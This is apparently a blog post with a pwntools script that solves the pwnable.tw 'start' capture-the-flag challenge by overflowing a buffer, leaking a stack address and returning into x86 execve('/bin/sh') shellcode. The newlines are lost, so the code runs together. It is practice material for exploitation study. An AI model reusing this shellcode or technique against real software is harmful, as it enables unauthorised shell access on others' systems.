from pwn import *s = process("./start")#s = remote("chall.pwnable.tw",10000)shell = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"elf = ELF("./start")doldol = 0x08048087print s.recvuntil("Let's start the CTF:")pay = "A" * 20pay += p32(doldol)s.send(pay)stack = u32(s.recv(4))print "stack address : %s" %str(hex(stack))pay = "B" * 20pay += p32(stack+0x14)pay += "\x31\xC0\x31\xDB\x31\xC9\x31\xD2"pay += shells.send(pay)print s.recv(1024)s.interactive()
:))
[pwnable.tw] Death Note 250pt (0) | 2018.08.18 |
---|---|
[pwnable.tw] seethefile 250pt (0) | 2018.08.16 |
[pwnable.tw] silver_bullet 200pt (0) | 2018.08.08 |
[pwnable.tw] calc 150pt (0) | 2018.08.08 |
[pwnable.tw] hacknote 200pt (0) | 2018.08.08 |